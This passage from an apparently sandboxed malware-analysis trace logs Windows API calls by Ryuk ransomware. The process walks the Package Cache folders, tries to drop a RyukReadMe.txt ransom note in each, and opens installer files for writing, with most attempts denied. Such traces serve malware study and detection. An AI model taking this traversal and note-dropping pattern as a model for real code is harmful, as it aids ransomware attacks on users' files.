lpFindFileData=0x29abb30) returned 1 [0140.793] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0140.793] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0140.793] SetLastError (dwErrCode=0x0) [0140.793] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.793] GetLastError () returned 0x5 [0140.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.793] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.793] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.793] SetLastError (dwErrCode=0x0) [0140.793] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.793] GetLastError () returned 0x5 [0140.793] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.794] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.794] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.794] SetLastError (dwErrCode=0x0) [0140.794] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.794] GetLastError () returned 0x5 [0140.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.794] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.794] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.794] SetLastError (dwErrCode=0x0) [0140.794] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.794] GetLastError () returned 0x5 [0140.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.794] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.794] SetLastError (dwErrCode=0x0) [0140.794] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.794] GetLastError () returned 0x5 [0140.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.794] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.796] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.796] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.796] SetLastError (dwErrCode=0x0) [0140.796] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.796] GetLastError () returned 0x5 [0140.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.796] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.796] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.796] SetLastError (dwErrCode=0x0) [0140.796] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.796] GetLastError () returned 0x5 [0140.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.796] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.797] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.797] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.797] SetLastError (dwErrCode=0x0) [0140.797] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.797] GetLastError () returned 0x5 [0140.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.797] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.797] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.798] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.798] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0140.798] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0140.798] SetLastError (dwErrCode=0x0) [0140.798] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.798] GetLastError () returned 0x5 [0140.798] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.798] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.798] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.798] SetLastError (dwErrCode=0x0) [0140.798] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.798] GetLastError () returned 0x5 [0140.798] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.798] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.798] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.798] SetLastError (dwErrCode=0x0) [0140.798] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.798] GetLastError () returned 0x5 [0140.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.799] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.799] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.799] SetLastError (dwErrCode=0x0) [0140.799] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.799] GetLastError () returned 0x5 [0140.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.799] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.799] SetLastError (dwErrCode=0x0) [0140.799] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.799] GetLastError () returned 0x5 [0140.799] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.799] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.799] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.799] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.800] SetLastError (dwErrCode=0x0) [0140.800] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.800] GetLastError () returned 0x5 [0140.800] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.800] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.800] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.800] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.800] SetLastError (dwErrCode=0x0) [0140.801] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.801] GetLastError () returned 0x5 [0140.801] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.801] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.801] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.801] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.801] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.801] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.802] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.802] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.802] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.802] SetLastError (dwErrCode=0x0) [0140.802] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.802] GetLastError () returned 0x5 [0140.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.802] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.802] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.802] SetLastError (dwErrCode=0x0) [0140.802] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.802] GetLastError () returned 0x5 [0140.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.802] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.802] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.802] SetLastError (dwErrCode=0x0) [0140.803] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.803] GetLastError () returned 0x5 [0140.803] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.803] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.803] SetLastError (dwErrCode=0x0) [0140.803] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.803] GetLastError () returned 0x5 [0140.803] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.803] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.803] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.803] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.803] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.804] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.804] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.804] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.804] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.804] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.804] SetLastError (dwErrCode=0x0) [0140.804] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.804] GetLastError () returned 0x5 [0140.804] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.804] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.804] SetLastError (dwErrCode=0x0) [0140.804] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.805] GetLastError () returned 0x5 [0140.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.805] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.805] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.805] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.805] SetLastError (dwErrCode=0x0) [0140.806] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package 